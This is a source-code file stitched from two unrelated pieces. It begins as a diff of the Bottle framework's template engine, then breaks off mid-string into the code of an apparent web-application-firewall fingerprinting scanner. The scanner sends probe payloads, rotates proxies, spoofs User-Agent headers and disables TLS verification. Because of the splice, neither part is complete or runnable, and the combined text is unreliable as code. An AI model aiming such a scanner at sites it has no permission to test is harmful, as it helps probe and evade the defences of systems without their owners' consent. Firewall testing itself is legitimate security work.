''' - def prepare(self, **options): - depr('The SimpleTAL template handler is deprecated'\ - ' and will be removed in 0.12') - from simpletal import simpleTAL - if self.source: - self.tpl = simpleTAL.compileHTMLTemplate(self.source) - else: - with open(self.filename, 'rb') as fp: - self.tpl = simpleTAL.compileHTMLTemplate(tonat(fp.read())) - - def render(self, *args, **kwargs): - from simpletal import simpleTALES - for dictarg in args: kwargs.update(dictarg) - context = simpleTALES.Context() - for k,v in self.defaults.items(): - context.addGlobal(k, v) - for k,v in kwargs.items(): - context.addGlobal(k, v) - output = StringIO() - self.tpl.expand(context, output) - return output.getvalue() + return (f.read().decode(self.encoding), fname, lambda: False) class SimpleTemplate(BaseTemplate): - blocks = ('if', 'elif', 'else', 'try', 'except', 'finally', 'for', 'while', - 'with', 'def', 'class') - dedent_blocks = ('elif', 'else', 'except', 'finally') - - @lazy_attribute - def re_pytokens(cls): - ''' This matches comments and all kinds of quoted strings but does - NOT match comments (#...) within quoted strings. (trust me) ''' - return re.compile(r''' - (''(?!')|""(?!")|'{6}|"{6} # Empty strings (all 4 types) - |'(?:[^\\']|\\.)+?' # Single quotes (') - |"(?:[^\\"]|\\.)+?" # Double quotes (") - |'{3}(?:[^\\]|\\.|\n)+?'{3} # Triple-quoted strings (') - |"{3}(?:[^\\]|\\.|\n)+?"{3} # Triple-quoted strings (") - |\#.* # Comments - )''', re.VERBOSE) - - def prepare(self, escape_func=html_escape, noescape=False, **kwargs): + def prepare(self, + escape_func=html_escape, + noescape=False, + syntax=None, **ka): self.cache = {} enc = self.encoding self._str = lambda x: touni(x, enc) self._escape = lambda x: escape_func(touni(x, enc)) + self.syntax = syntax if noescape: self._str, self._escape = self._escape, self._str - @classmethod - def split_comment(cls, code): - """ Removes comments (#...) from python code. 
""" - if '#' not in code: return code - #: Remove comments only (leave quoted strings as they are) - subf = lambda m: '' if m.group(0)[0]=='#' else m.group(0) - return re.sub(cls.re_pytokens, subf, code) - @cached_property def co(self): return compile(self.code, self.filename or '<string>', 'exec') @cached_property def code(self): - stack = [] # Current Code indentation - lineno = 0 # Current line of code - ptrbuffer = [] # Buffer for printable strings and token tuple instances - codebuffer = [] # Buffer for generated python code - multiline = dedent = oneline = False - template = self.source or open(self.filename, 'rb').read() - - def yield_tokens(line): - for i, part in enumerate(re.split(r'\{\{(.*?)\}\}', line)): - if i % 2: - if part.startswith('!'): yield 'RAW', part[1:] - else: yield 'CMD', part - else: yield 'TXT', part - - def flush(): # Flush the ptrbuffer - if not ptrbuffer: return - cline = '' - for line in ptrbuffer: - for token, value in line: - if token == 'TXT': cline += repr(value) - elif token == 'RAW': cline += '_str(%s)' % value - elif token == 'CMD': cline += '_escape(%s)' % value - cline += ', ' - cline = cline[:-2] + '\\\n' - cline = cline[:-2] - if cline[:-1].endswith('\\\\\\\\\\n'): - cline = cline[:-7] + cline[-1] # 'nobr\\\\\n' --> 'nobr' - cline = '_printlist([' + cline + '])' - del ptrbuffer[:] # Do this before calling code() again - code(cline) - - def code(stmt): - for line in stmt.splitlines(): - codebuffer.append(' ' * len(stack) + line.strip()) - - for line in template.splitlines(True): - lineno += 1 - line = touni(line, self.encoding) - sline = line.lstrip() - if lineno <= 2: - m = re.match(r"%\s*#.*coding[:=]\s*([-\w.]+)", sline) - if m: self.encoding = m.group(1) - if m: line = line.replace('coding','coding (removed)') - if sline and sline[0] == '%' and sline[:2] != '%%': - line = line.split('%',1)[1].lstrip() # Full line following the % - cline = self.split_comment(line).strip() - cmd = re.split(r'[^a-zA-Z0-9_]', cline)[0] - flush() # You are actually reading this? 
Good luck, it's a mess :) - if cmd in self.blocks or multiline: - cmd = multiline or cmd - dedent = cmd in self.dedent_blocks # "else:" - if dedent and not oneline and not multiline: - cmd = stack.pop() - code(line) - oneline = not cline.endswith(':') # "if 1: pass" - multiline = cmd if cline.endswith('\\') else False - if not oneline and not multiline: - stack.append(cmd) - elif cmd == 'end' and stack: - code('#end(%s) %s' % (stack.pop(), line.strip()[3:])) - elif cmd == 'include': - p = cline.split(None, 2)[1:] - if len(p) == 2: - code("_=_include(%s, _stdout, %s)" % (repr(p[0]), p[1])) - elif p: - code("_=_include(%s, _stdout)" % repr(p[0])) - else: # Empty %include -> reverse of %rebase - code("_printlist(_base)") - elif cmd == 'rebase': - p = cline.split(None, 2)[1:] - if len(p) == 2: - code("globals()['_rebase']=(%s, dict(%s))" % (repr(p[0]), p[1])) - elif p: - code("globals()['_rebase']=(%s, {})" % repr(p[0])) - else: - code(line) - else: # Line starting with text (not '%') or '%%' (escaped) - if line.strip().startswith('%%'): - line = line.replace('%%', '%', 1) - ptrbuffer.append(yield_tokens(line)) - flush() - return '\n'.join(codebuffer) + '\n' - - def subtemplate(self, _name, _stdout, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + source = self.source + if not source: + with open(self.filename, 'rb') as f: + source = f.read() + try: + source, encoding = touni(source), 'utf8' + except UnicodeError: + raise depr(0, 11, 'Unsupported template encodings.', 'Use utf-8 for templates.') + parser = StplParser(source, encoding=encoding, syntax=self.syntax) + code = parser.translate() + self.encoding = parser.encoding + return code + + def _rebase(self, _env, _name=None, **kwargs): + _env['_rebase'] = (_name, kwargs) + + def _include(self, _env, _name=None, **kwargs): + env = _env.copy() + env.update(kwargs) if _name not in self.cache: - self.cache[_name] = self.__class__(name=_name, lookup=self.lookup) - return self.cache[_name].execute(_stdout, kwargs) + self.cache[_name] = self.__class__(name=_name, lookup=self.lookup, syntax=self.syntax) + return self.cache[_name].execute(env['_stdout'], env) - def execute(self, _stdout, *args, **kwargs): - for dictarg in args: kwargs.update(dictarg) + def execute(self, _stdout, kwargs): env = self.defaults.copy() - env.update({'_stdout': _stdout, '_printlist': _stdout.extend, - '_include': self.subtemplate, '_str': self._str, - '_escape': self._escape, 'get': env.get, - 'setdefault': env.setdefault, 'defined': env.__contains__}) env.update(kwargs) - eval(self.co, env) - if '_rebase' in env: - subtpl, rargs = env['_rebase'] - rargs['_base'] = _stdout[:] #copy stdout - del _stdout[:] # clear stdout - return self.subtemplate(subtpl,_stdout,rargs) + env.update({ + '_stdout': _stdout, + '_printlist': _stdout.extend, + 'include': functools.partial(self._include, env), + 'rebase': functools.partial(self._rebase, env), + '_rebase': None, + '_str': self._str, + '_escape': self._escape, + 'get': env.get, + 'setdefault': env.setdefault, + 'defined': env.__contains__ + }) + exec(self.co, env) + if env.get('_rebase'): + subtpl, rargs = env.pop('_rebase') + rargs['base'] = ''.join(_stdout) #copy stdout + del _stdout[:] # clear stdout + return self._include(env, subtpl, **rargs) return env def render(self, *args, **kwargs): """ Render the template using keyword arguments as local variables. 
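# --- Editor's sketch (not part of the patch) ---------------------------------
# Hedged usage example of the SimpleTemplate syntax handled above (default
# tokens '<% %> % {{ }}'): a '%' line starts a code block closed by 'end', and
# inline {{ }} expressions are HTML-escaped unless prefixed with '!'.
from bottle import SimpleTemplate

tpl = SimpleTemplate("""\
% for item in items:
  * {{ item }}
% end
raw: {{ !marker }}
""")
print(tpl.render(items=['a', '<b>'], marker='<hr/>'))   # '<b>' comes out escaped
# ------------------------------------------------------------------------------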
""" - for dictarg in args: kwargs.update(dictarg) + env = {} stdout = [] - self.execute(stdout, kwargs) + for dictarg in args: + env.update(dictarg) + env.update(kwargs) + self.execute(stdout, env) return ''.join(stdout) -def template(*args, **kwargs): +class StplSyntaxError(TemplateError): + pass + + +class StplParser(object): + """ Parser for stpl templates. """ + _re_cache = {} #: Cache for compiled re patterns + + # This huge pile of voodoo magic splits python code into 8 different tokens. + # We use the verbose (?x) regex mode to make this more manageable + + _re_tok = r'''( + [urbURB]* + (?: ''(?!') + |""(?!") + |'{6} + |"{6} + |'(?:[^\\']|\\.)+?' + |"(?:[^\\"]|\\.)+?" + |'{3}(?:[^\\]|\\.|\n)+?'{3} + |"{3}(?:[^\\]|\\.|\n)+?"{3} + ) + )''' + + _re_inl = _re_tok.replace(r'|\n', '') # We re-use this string pattern later + + _re_tok += r''' + # 2: Comments (until end of line, but not the newline itself) + |(\#.*) + + # 3: Open and close (4) grouping tokens + |([\[\{\(]) + |([\]\}\)]) + + # 5,6: Keywords that start or continue a python block (only start of line) + |^([\ \t]*(?:if|for|while|with|try|def|class)\b) + |^([\ \t]*(?:elif|else|except|finally)\b) + + # 7: Our special 'end' keyword (but only if it stands alone) + |((?:^|;)[\ \t]*end[\ \t]*(?=(?:%(block_close)s[\ \t]*)?\r?$|;|\#)) + + # 8: A customizable end-of-code-block template token (only end of line) + |(%(block_close)s[\ \t]*(?=\r?$)) + + # 9: And finally, a single newline. The 10th token is 'everything else' + |(\r?\n) ''' + + # Match the start tokens of code areas in a template + _re_split = r'''(?m)^[ \t]*(\\?)((%(line_start)s)|(%(block_start)s))''' + # Match inline statements (may contain python strings) + _re_inl = r'''%%(inline_start)s((?:%s|[^'"\n])*?)%%(inline_end)s''' % _re_inl + + # add the flag in front of the regexp to avoid Deprecation warning (see Issue #949) + # verbose and dot-matches-newline mode + _re_tok = '(?mx)' + _re_tok + _re_inl = '(?mx)' + _re_inl + + + default_syntax = '<% %> % {{ }}' + + def __init__(self, source, syntax=None, encoding='utf8'): + self.source, self.encoding = touni(source, encoding), encoding + self.set_syntax(syntax or self.default_syntax) + self.code_buffer, self.text_buffer = [], [] + self.lineno, self.offset = 1, 0 + self.indent, self.indent_mod = 0, 0 + self.paren_depth = 0 + + def get_syntax(self): + """ Tokens as a space separated string (default: <% %> % {{ }}) """ + return self._syntax + + def set_syntax(self, syntax): + self._syntax = syntax + self._tokens = syntax.split() + if syntax not in self._re_cache: + names = 'block_start block_close line_start inline_start inline_end' + etokens = map(re.escape, self._tokens) + pattern_vars = dict(zip(names.split(), etokens)) + patterns = (self._re_split, self._re_tok, self._re_inl) + patterns = [re.compile(p % pattern_vars) for p in patterns] + self._re_cache[syntax] = patterns + self.re_split, self.re_tok, self.re_inl = self._re_cache[syntax] + + syntax = property(get_syntax, set_syntax) + + def translate(self): + if self.offset: raise RuntimeError('Parser is a one time instance.') + while True: + m = self.re_split.search(self.source, pos=self.offset) + if m: + text = self.source[self.offset:m.start()] + self.text_buffer.append(text) + self.offset = m.end() + if m.group(1): # Escape syntax + line, sep, _ = self.source[self.offset:].partition('\n') + self.text_buffer.append(self.source[m.start():m.start(1)] + + m.group(2) + line + sep) + self.offset += len(line + sep) + continue + self.flush_text() + self.offset += 
self.read_code(self.source[self.offset:], + multiline=bool(m.group(4))) + else: + break + self.text_buffer.append(self.source[self.offset:]) + self.flush_text() + return ''.join(self.code_buffer) + + def read_code(self, pysource, multiline): + code_line, comment = '', '' + offset = 0 + while True: + m = self.re_tok.search(pysource, pos=offset) + if not m: + code_line += pysource[offset:] + offset = len(pysource) + self.write_code(code_line.strip(), comment) + break + code_line += pysource[offset:m.start()] + offset = m.end() + _str, _com, _po, _pc, _blk1, _blk2, _end, _cend, _nl = m.groups() + if self.paren_depth > 0 and (_blk1 or _blk2): # a if b else c + code_line += _blk1 or _blk2 + continue + if _str: # Python string + code_line += _str + elif _com: # Python comment (up to EOL) + comment = _com + if multiline and _com.strip().endswith(self._tokens[1]): + multiline = False # Allow end-of-block in comments + elif _po: # open parenthesis + self.paren_depth += 1 + code_line += _po + elif _pc: # close parenthesis + if self.paren_depth > 0: + # we could check for matching parentheses here, but it's + # easier to leave that to python - just check counts + self.paren_depth -= 1 + code_line += _pc + elif _blk1: # Start-block keyword (if/for/while/def/try/...) + code_line = _blk1 + self.indent += 1 + self.indent_mod -= 1 + elif _blk2: # Continue-block keyword (else/elif/except/...) + code_line = _blk2 + self.indent_mod -= 1 + elif _cend: # The end-code-block template token (usually '%>') + if multiline: multiline = False + else: code_line += _cend + elif _end: + self.indent -= 1 + self.indent_mod += 1 + else: # \n + self.write_code(code_line.strip(), comment) + self.lineno += 1 + code_line, comment, self.indent_mod = '', '', 0 + if not multiline: + break + + return offset + + def flush_text(self): + text = ''.join(self.text_buffer) + del self.text_buffer[:] + if not text: return + parts, pos, nl = [], 0, '\\\n' + ' ' * self.indent + for m in self.re_inl.finditer(text): + prefix, pos = text[pos:m.start()], m.end() + if prefix: + parts.append(nl.join(map(repr, prefix.splitlines(True)))) + if prefix.endswith('\n'): parts[-1] += nl + parts.append(self.process_inline(m.group(1).strip())) + if pos < len(text): + prefix = text[pos:] + lines = prefix.splitlines(True) + if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3] + elif lines[-1].endswith('\\\\\r\n'): lines[-1] = lines[-1][:-4] + parts.append(nl.join(map(repr, lines))) + code = '_printlist((%s,))' % ', '.join(parts) + self.lineno += code.count('\n') + 1 + self.write_code(code) + + @staticmethod + def process_inline(chunk): + if chunk[0] == '!': return '_str(%s)' % chunk[1:] + return '_escape(%s)' % chunk + + def write_code(self, line, comment=''): + code = ' ' * (self.indent + self.indent_mod) + code += line.lstrip() + comment + '\n' + self.code_buffer.append(code) + + +def template(*args, **kwargs): + """ Get a rendered template as a string iterator. You can use a name, a filename or a template string as first parameter. Template rendering arguments can be passed as dictionaries or directly (as keyword arguments). 
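# --- Editor's sketch (not part of the patch) ---------------------------------
# Hedged usage example for template() and the view() decorator defined above;
# 'hello' refers to an illustrative <lookup path>/hello.tpl template.
from bottle import route, view, template

@route('/hello/<name>')
@view('hello')                      # renders hello.tpl with the returned dict
def hello(name):
    return {'name': name}

# equivalent without the decorator:
# return template('hello', name='world')
# ------------------------------------------------------------------------------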
- ''' + """ tpl = args[0] if args else None + for dictarg in args[1:]: + kwargs.update(dictarg) adapter = kwargs.pop('template_adapter', SimpleTemplate) lookup = kwargs.pop('template_lookup', TEMPLATE_PATH) tplid = (id(lookup), tpl) @@ -3117,17 +4494,17 @@ def template(*args, **kwargs): TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings) if not TEMPLATES[tplid]: abort(500, 'Template (%s) not found' % tpl) - for dictarg in args[1:]: kwargs.update(dictarg) return TEMPLATES[tplid].render(kwargs) + mako_template = functools.partial(template, template_adapter=MakoTemplate) -cheetah_template = functools.partial(template, template_adapter=CheetahTemplate) +cheetah_template = functools.partial(template, + template_adapter=CheetahTemplate) jinja2_template = functools.partial(template, template_adapter=Jinja2Template) -simpletal_template = functools.partial(template, template_adapter=SimpleTALTemplate) def view(tpl_name, **defaults): - ''' Decorator: renders a template for a handler. + """ Decorator: renders a template for a handler. The handler can control its behavior like that: - return a dict of template vars to fill out the template @@ -3135,8 +4512,10 @@ def view(tpl_name, **defaults): process the template, but return the handler result as is. This includes returning a HTTPResponse(dict) to get, for instance, JSON with autojson or other castfilters. - ''' + """ + def decorator(func): + @functools.wraps(func) def wrapper(*args, **kwargs): result = func(*args, **kwargs) @@ -3145,50 +4524,48 @@ def wrapper(*args, **kwargs): tplvars.update(result) return template(tpl_name, **tplvars) elif result is None: - return template(tpl_name, defaults) + return template(tpl_name, **defaults) return result + return wrapper + return decorator + mako_view = functools.partial(view, template_adapter=MakoTemplate) cheetah_view = functools.partial(view, template_adapter=CheetahTemplate) jinja2_view = functools.partial(view, template_adapter=Jinja2Template) -simpletal_view = functools.partial(view, template_adapter=SimpleTALTemplate) - - - - - ############################################################################### # Constants and Globals ######################################################## ############################################################################### - TEMPLATE_PATH = ['./', './views/'] TEMPLATES = {} DEBUG = False -NORUN = False # If set, run() does nothing. Used by load_app() +NORUN = False # If set, run() does nothing. Used by load_app() #: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found') -HTTP_CODES = httplib.responses -HTTP_CODES[418] = "I'm a teapot" # RFC 2324 +HTTP_CODES = httplib.responses.copy() +HTTP_CODES[418] = "I'm a teapot" # RFC 2324 HTTP_CODES[428] = "Precondition Required" HTTP_CODES[429] = "Too Many Requests" HTTP_CODES[431] = "Request Header Fields Too Large" +HTTP_CODES[451] = "Unavailable For Legal Reasons" # RFC 7725 HTTP_CODES[511] = "Network Authentication Required" -_HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items()) +_HTTP_STATUS_LINES = dict((k, '%d %s' % (k, v)) + for (k, v) in HTTP_CODES.items()) #: The default template used for error pages. 
Override with @error() ERROR_PAGE_TEMPLATE = """ %%try: - %%from %s import DEBUG, HTTP_CODES, request, touni + %%from %s import DEBUG, request <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: {{e.status}} |<[^>]+>|\s+", " ", retval[HTML]) + match = re.search(r"(?im)^Server: (.+)", retval[RAW]) + retval[SERVER] = match.group(1).strip() if match else "" + return retval + +def calc_hash(value, binary=True): + value = value.encode("utf8") if not isinstance(value, bytes) else value + result = zlib.crc32(value) & 0xffff + if binary: + result = struct.pack(">H", result) + return result + +def single_print(message): + if message not in seen: + print(message) + seen.add(message) + +def check_payload(payload, protection_regex=GENERIC_PROTECTION_REGEX % '|'.join(GENERIC_PROTECTION_KEYWORDS)): + global chained + global heuristic + global intrusive + global locked_code + global locked_regex + + time.sleep(options.delay or 0) + if options.post: + _ = "%s=%s" % ("".join(random.sample(string.ascii_letters, 3)), quote(payload)) + intrusive = retrieve(options.url, _) + else: + _ = "%s%s%s=%s" % (options.url, '?' if '?' not in options.url else '&', "".join(random.sample(string.ascii_letters, 3)), quote(payload)) + intrusive = retrieve(_) + + if options.lock and not payload.isdigit(): + if payload == HEURISTIC_PAYLOAD: + match = re.search(re.sub(r"Server:|Protected by", "".join(random.sample(string.ascii_letters, 6)), WAF_RECOGNITION_REGEX, flags=re.I), intrusive[RAW] or "") + if match: + result = True + + for _ in match.groupdict(): + if match.group(_): + waf = re.sub(r"\Awaf_", "", _) + locked_regex = DATA_JSON["wafs"][waf]["regex"] + locked_code = intrusive[HTTPCODE] + break + else: + result = False + + if not result: + exit(colorize("[x] can't lock results to a non-blind match")) + else: + result = re.search(locked_regex, intrusive[RAW]) is not None and locked_code == intrusive[HTTPCODE] + elif options.string: + result = options.string in (intrusive[RAW] or "") + elif options.code: + result = options.code == intrusive[HTTPCODE] + else: + result = intrusive[HTTPCODE] != original[HTTPCODE] or (intrusive[HTTPCODE] != 200 and intrusive[TITLE] != original[TITLE]) or (re.search(protection_regex, intrusive[HTML]) is not None and re.search(protection_regex, original[HTML]) is None) or (difflib.SequenceMatcher(a=original[HTML] or "", b=intrusive[HTML] or "").quick_ratio() < QUICK_RATIO_THRESHOLD) + + if not payload.isdigit(): + if result: + if options.debug: + print("\r---%s" % (40 * ' ')) + print(payload) + print(intrusive[HTTPCODE], intrusive[RAW]) + print("---") + + if intrusive[SERVER]: + servers.add(re.sub(r"\s*\(.+\)\Z", "", intrusive[SERVER])) + if len(servers) > 1: + chained = True + single_print(colorize("[!] multiple (reactive) rejection HTTP 'Server' headers detected (%s)" % ', '.join("'%s'" % _ for _ in sorted(servers)))) + + if intrusive[HTTPCODE]: + codes.add(intrusive[HTTPCODE]) + if len(codes) > 1: + chained = True + single_print(colorize("[!] multiple (reactive) rejection HTTP codes detected (%s)" % ', '.join("%s" % _ for _ in sorted(codes)))) + + if heuristic and heuristic[HTML] and intrusive[HTML] and difflib.SequenceMatcher(a=heuristic[HTML] or "", b=intrusive[HTML] or "").quick_ratio() < QUICK_RATIO_THRESHOLD: + chained = True + single_print(colorize("[!] 
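# --- Editor's sketch (not part of the patch) ---------------------------------
# Standalone illustration of the hashing used by calc_hash() above: each
# (rejected) response is reduced to a 16-bit CRC, optionally packed as two
# big-endian bytes for the blind signature. Sample inputs are illustrative.
import struct
import zlib

def crc16(value):
    value = value.encode("utf8") if not isinstance(value, bytes) else value
    return zlib.crc32(value) & 0xffff

print(crc16("Access Denied"), struct.pack(">H", crc16("Access Denied")))
print(crc16("Request blocked"))      # a different rejection page, different CRC
# ------------------------------------------------------------------------------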
multiple (reactive) rejection HTML responses detected")) + + if payload == HEURISTIC_PAYLOAD: + heuristic = intrusive + + return result + +def colorize(message): + if COLORIZE: + message = re.sub(r"\[(.)\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message) + + if any(_ in message for _ in ("rejected summary", "challenge detected")): + for match in re.finditer(r"[^\w]'([^)]+)'" if "rejected summary" in message else r"\('(.+)'\)", message): + message = message.replace("'%s'" % match.group(1), "'\033[37m%s\033[00;49m'" % match.group(1), 1) + else: + for match in re.finditer(r"[^\w]'([^']+)'", message): + message = message.replace("'%s'" % match.group(1), "'\033[37m%s\033[00;49m'" % match.group(1), 1) + + if "blind match" in message: + for match in re.finditer(r"\(((\d+)%)\)", message): + message = message.replace(match.group(1), "\033[%dm%s\033[00;49m" % (92 if int(match.group(2)) >= 95 else (93 if int(match.group(2)) > 80 else 90), match.group(1))) + + if "hardness" in message: + for match in re.finditer(r"\(((\d+)%)\)", message): + message = message.replace(match.group(1), "\033[%dm%s\033[00;49m" % (95 if " insane " in message else (91 if " hard " in message else (93 if " moderate " in message else 92)), match.group(1))) + + return message + +def parse_args(): + global options + + parser = optparse.OptionParser(version=VERSION) + parser.add_option("--delay", dest="delay", type=int, help="Delay (sec) between tests (default: 0)") + parser.add_option("--timeout", dest="timeout", type=int, help="Response timeout (sec) (default: 10)") + parser.add_option("--proxy", dest="proxy", help="HTTP proxy address (e.g. \"http://127.0.0.1:8080\")") + parser.add_option("--proxy-file", dest="proxy_file", help="Load (rotating) HTTP(s) proxy list from a file") + parser.add_option("--random-agent", dest="random_agent", action="store_true", help="Use random HTTP User-Agent header value") + parser.add_option("--code", dest="code", type=int, help="Expected HTTP code in rejected responses") + parser.add_option("--string", dest="string", help="Expected string in rejected responses") + parser.add_option("--post", dest="post", action="store_true", help="Use POST body for sending payloads") + parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP) + parser.add_option("--fast", dest="fast", action="store_true", help=optparse.SUPPRESS_HELP) + parser.add_option("--lock", dest="lock", action="store_true", help=optparse.SUPPRESS_HELP) + + # Dirty hack(s) for help message + def _(self, *args): + retval = parser.formatter._format_option_strings(*args) + if len(retval) > MAX_HELP_OPTION_LENGTH: + retval = ("%%.%ds.." 
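# --- Editor's sketch (not part of the patch) ---------------------------------
# Standalone illustration of the level-marker colouring done by colorize()
# above: the character inside "[x]", "[+]", "[!]", ... is wrapped in an ANSI
# colour taken from a LEVEL_COLORS-style mapping (the codes below are
# illustrative, not the script's actual mapping).
import re

LEVEL_COLORS = {"x": "\033[91m", "+": "\033[92m", "!": "\033[93m",
                "i": "\033[94m", "o": "\033[90m"}          # illustrative codes

def colorize(message):
    return re.sub(r"\[(.)\]",
                  lambda m: "[%s%s\033[00;49m]" % (LEVEL_COLORS.get(m.group(1), ""), m.group(1)),
                  message)

print(colorize("[x] host 'example.com' does not exist"))
# ------------------------------------------------------------------------------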
% (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retval + return retval + + parser.usage = "python %s " % parser.usage + parser.formatter._format_option_strings = parser.formatter.format_option_strings + parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser) + + for _ in ("-h", "--version"): + option = parser.get_option(_) + option.help = option.help.capitalize() + + try: + options, _ = parser.parse_args() + except SystemExit: + raise + + if len(sys.argv) > 1: + url = sys.argv[-1] + if not url.startswith("http"): + url = "http://%s" % url + options.url = url + else: + parser.print_help() + raise SystemExit + + for key in DEFAULTS: + if getattr(options, key, None) is None: + setattr(options, key, DEFAULTS[key]) + +def load_data(): + global WAF_RECOGNITION_REGEX + + if os.path.isfile(DATA_JSON_FILE): + with open(DATA_JSON_FILE, "r") as f: + DATA_JSON.update(json.load(f)) + + WAF_RECOGNITION_REGEX = "" + for waf in DATA_JSON["wafs"]: + if DATA_JSON["wafs"][waf]["regex"]: + WAF_RECOGNITION_REGEX += "%s|" % ("(?P%s)" % (waf, DATA_JSON["wafs"][waf]["regex"])) + for signature in DATA_JSON["wafs"][waf]["signatures"]: + SIGNATURES[signature] = waf + WAF_RECOGNITION_REGEX = WAF_RECOGNITION_REGEX.strip('|') + + flags = "".join(set(_ for _ in "".join(re.findall(r"\(\?(\w+)\)", WAF_RECOGNITION_REGEX)))) + WAF_RECOGNITION_REGEX = "(?%s)%s" % (flags, re.sub(r"\(\?\w+\)", "", WAF_RECOGNITION_REGEX)) # patch for "DeprecationWarning: Flags not at the start of the expression" in Python3.7 + else: + exit(colorize("[x] file '%s' is missing" % DATA_JSON_FILE)) + +def init(): + os.chdir(os.path.abspath(os.path.dirname(__file__))) + + # Reference: http://blog.mathieu-leplatre.info/python-utf-8-print-fails-when-redirecting-stdout.html + if not PY3 and not IS_TTY: + sys.stdout = codecs.getwriter(locale.getpreferredencoding())(sys.stdout) + + print(colorize("[o] initializing handlers...")) + + # Reference: https://stackoverflow.com/a/28052583 + if hasattr(ssl, "_create_unverified_context"): + ssl._create_default_https_context = ssl._create_unverified_context + + if options.proxy_file: + if os.path.isfile(options.proxy_file): + print(colorize("[o] loading proxy list...")) + + with open(options.proxy_file, "r") as f: + proxies.extend(re.sub(r"\s.*", "", _.strip()) for _ in f.read().strip().split('\n') if _.startswith("http")) + random.shuffle(proxies) + else: + exit(colorize("[x] file '%s' does not exist" % options.proxy_file)) + + + cookie_jar = CookieJar() + opener = build_opener(HTTPCookieProcessor(cookie_jar)) + install_opener(opener) + + if options.proxy: + opener = build_opener(ProxyHandler({"http": options.proxy, "https": options.proxy})) + install_opener(opener) + + if options.random_agent: + revision = random.randint(20, 64) + platform = random.sample(("X11; %s %s" % (random.sample(("Linux", "Ubuntu; Linux", "U; Linux", "U; OpenBSD", "U; FreeBSD"), 1)[0], random.sample(("amd64", "i586", "i686", "amd64"), 1)[0]), "Windows NT %s%s" % (random.sample(("5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"), 1)[0], random.sample(("", "; Win64", "; WOW64"), 1)[0]), "Macintosh; Intel Mac OS X 10.%s" % random.randint(1, 11)), 1)[0] + user_agent = "Mozilla/5.0 (%s; rv:%d.0) Gecko/20100101 Firefox/%d.0" % (platform, revision, revision) + HEADERS["User-Agent"] = user_agent + +def format_name(waf): + return "%s%s" % (DATA_JSON["wafs"][waf]["name"], (" (%s)" % DATA_JSON["wafs"][waf]["company"]) if DATA_JSON["wafs"][waf]["name"] != 
DATA_JSON["wafs"][waf]["company"] else "") + +def non_blind_check(raw, silent=False): + retval = False + match = re.search(WAF_RECOGNITION_REGEX, raw or "") + if match: + retval = True + for _ in match.groupdict(): + if match.group(_): + waf = re.sub(r"\Awaf_", "", _) + non_blind.add(waf) + if not silent: + single_print(colorize("[+] non-blind match: '%s'%s" % (format_name(waf), 20 * ' '))) + return retval + +def run(): + global original + + hostname = options.url.split("//")[-1].split('/')[0].split(':')[0] + + if not hostname.replace('.', "").isdigit(): + print(colorize("[i] checking hostname '%s'..." % hostname)) + try: + socket.getaddrinfo(hostname, None) + except socket.gaierror: + exit(colorize("[x] host '%s' does not exist" % hostname)) + + results = "" + signature = b"" + counter = 0 + original = retrieve(options.url) + + if 300 <= (original[HTTPCODE] or 0) < 400 and original[URL]: + original = retrieve(original[URL]) + + options.url = original[URL] + + if original[HTTPCODE] is None: + exit(colorize("[x] missing valid response")) + + if not any((options.string, options.code)) and original[HTTPCODE] >= 400: + non_blind_check(original[RAW]) + if options.debug: + print("\r---%s" % (40 * ' ')) + print(original[HTTPCODE], original[RAW]) + print("---") + exit(colorize("[x] access to host '%s' seems to be restricted%s" % (hostname, (" (%d: '%s')" % (original[HTTPCODE], original[TITLE].strip())) if original[TITLE] else ""))) + + challenge = None + if all(_ in original[HTML].lower() for _ in ("eval", "]*>(.*)", re.sub(r"(?is)", "", original[HTML])) + if re.search(r"(?i)<(body|div)", original[HTML]) is None or (match and len(match.group(1)) == 0): + challenge = re.search(r"(?is)", original[HTML]).group(0).replace("\n", "\\n") + print(colorize("[x] anti-robot JS challenge detected ('%s%s')" % (challenge[:MAX_JS_CHALLENGE_SNAPLEN], "..." 
if len(challenge) > MAX_JS_CHALLENGE_SNAPLEN else ""))) + + protection_keywords = GENERIC_PROTECTION_KEYWORDS + protection_regex = GENERIC_PROTECTION_REGEX % '|'.join(keyword for keyword in protection_keywords if keyword not in original[HTML].lower()) + + print(colorize("[i] running basic heuristic test...")) + if not check_payload(HEURISTIC_PAYLOAD): + check = False + if options.url.startswith("https://"): + options.url = options.url.replace("https://", "http://") + check = check_payload(HEURISTIC_PAYLOAD) + if not check: + if non_blind_check(intrusive[RAW]): + exit(colorize("[x] unable to continue due to static responses%s" % (" (captcha)" if re.search(r"(?i)captcha", intrusive[RAW]) is not None else ""))) + elif challenge is None: + exit(colorize("[x] host '%s' does not seem to be protected" % hostname)) + else: + exit(colorize("[x] response not changing without JS challenge solved")) + + if options.fast and not non_blind: + exit(colorize("[x] fast exit because of missing non-blind match")) + + if not intrusive[HTTPCODE]: + print(colorize("[i] rejected summary: RST|DROP")) + else: + _ = "...".join(match.group(0) for match in re.finditer(GENERIC_ERROR_MESSAGE_REGEX, intrusive[HTML])).strip().replace(" ", " ") + print(colorize(("[i] rejected summary: %d ('%s%s')" % (intrusive[HTTPCODE], ("%s" % intrusive[TITLE]) if intrusive[TITLE] else "", "" if not _ or intrusive[HTTPCODE] < 400 else ("...%s" % _))).replace(" ('')", ""))) + + found = non_blind_check(intrusive[RAW] if intrusive[HTTPCODE] is not None else original[RAW]) + + if not found: + print(colorize("[-] non-blind match: -")) + + for item in DATA_JSON["payloads"]: + info, payload = item.split("::", 1) + counter += 1 + + if IS_TTY: + sys.stdout.write(colorize("\r[i] running payload tests... (%d/%d)\r" % (counter, len(DATA_JSON["payloads"])))) + sys.stdout.flush() + + if counter % VERIFY_OK_INTERVAL == 0: + for i in xrange(VERIFY_RETRY_TIMES): + if not check_payload(str(random.randint(1, 9)), protection_regex): + break + elif i == VERIFY_RETRY_TIMES - 1: + exit(colorize("[x] host '%s' seems to be misconfigured 